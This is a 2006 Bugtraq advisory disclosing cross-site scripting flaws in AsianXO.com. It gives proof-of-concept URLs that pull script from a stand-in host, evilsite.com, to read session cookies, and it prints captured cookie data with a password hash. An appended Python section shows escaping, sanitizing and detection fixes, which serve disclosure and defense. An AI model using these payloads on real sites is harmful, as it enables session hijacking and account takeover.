Open Source and information security mailing list archives
Message-ID: <20060610090023.13758.qmail@securityfocus.com>
Date: 10 Jun 2006 09:00:23 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: AsianXO.com - XSS with cookie data include


AsianXO.com

Homepage:
http://www.asianxo.com/

Affected files:
directory.php
profiles.php
Input boxes of editing profile

----------------------------

XSS Vulnerability via dir_id:

Directory.php PoC:
http://www.axo2.com/directory.php?dir_id=1"><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT><"

Profiles.php PoC using malformed img tags in front of an open-ended iframe:
http://www.axo2.com/profiles.php?userid=999999999<""><iframe%20src=http://evilsite.com/scriptlet.html%20<

------------------------------

Another XSS example of profiles.php, this time using the allowed HTML tag <br> in a URL injection along with <script> tags, which also reveals some interesting data:

http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><BR><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

The output text:

This is remote text via xss.js located at evilsite.com phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60','gallery','height=500,width=700,status=0');"> 

When decoding the whole string from its hex (percent-encoded) values, we notice an autologinid along with our cookie data, which has our MD5'ed password hash in it.

a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:5:"10610";};

NOTE: You can also use <script>alert(document.cookie)</script> and it will create a popup box with the cookie data in it.

PoC:
http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><script>alert(document.cookie)</script>

---------------------

XSS Vulnerability of input boxes when editing profile:

The location input box doesn't correctly filter all data; for an XSS example we can enter a double < with ' and no closing >:

<'<IMG SRC=javascript:alert(&quot;XSS&quot;)
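The dir_id and profiles.php cases above are the same defect seen from two output contexts: a value echoed into an HTML attribute without quote escaping, and profile text where a few HTML tags are allowed but nothing else is filtered. The following added example (not code from the advisory or from the site) shows the unescaped rendering beside a context-aware fix, a tag whitelist for the allowed-<br> case, and a simple decoder-based check that flags such payloads in a query string. The payloads and the evilsite.example host are constructed stand-ins for the PoC strings in the post.

```python
import html
import re
from urllib.parse import unquote

# Constructed payloads modelled on the advisory's PoC URLs (not live URLs).
DIR_ID_PAYLOAD = '1"><SCRIPT SRC=http://evilsite.example/xss.js></SCRIPT><"'
USERID_PAYLOAD = '99999999<""><BR><BR><script>alert(document.cookie)</script>'


def render_directory_vulnerable(dir_id: str) -> str:
    """Mimics the directory.php flaw: the parameter lands in an attribute unescaped,
    so a leading quote closes the attribute and the rest becomes markup."""
    return f'<a href="directory.php?dir_id={dir_id}">Directory</a>'


def render_directory_fixed(dir_id: str) -> str:
    """Escape for the attribute context; quote=True also encodes " and '."""
    return f'<a href="directory.php?dir_id={html.escape(dir_id, quote=True)}">Directory</a>'


# Assumed whitelist for profile text; the site evidently allowed <br>.
ALLOWED_TAGS = {"br", "b", "i"}


def sanitize_profile_text(text: str) -> str:
    """Keep only bare whitelisted tags; every other tag and all other text is escaped."""
    out, pos = [], 0
    for m in re.finditer(r"<\s*(/?)\s*([a-zA-Z]+)\s*>", text):
        out.append(html.escape(text[pos:m.start()], quote=True))
        slash, name = m.group(1), m.group(2).lower()
        out.append(f"<{slash}{name}>" if name in ALLOWED_TAGS
                   else html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(text[pos:], quote=True))
    return "".join(out)


def contains_script_tag(rendered: str) -> bool:
    """True if a live <script ...> tag survives in the rendered HTML."""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None


def looks_like_reflected_xss(query_string: str) -> bool:
    """Log/WAF-style check: percent-decode first, since the PoCs arrive encoded."""
    decoded = unquote(query_string)
    return re.search(r"<\s*(script|iframe|img)\b|javascript:", decoded, re.IGNORECASE) is not None
```

Output escaping stops the injection, but the cookie exposure is a separate control: marking phpbb2mysql_data and phpbb2mysql_sid HttpOnly keeps document.cookie from handing them to any script that does get injected.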

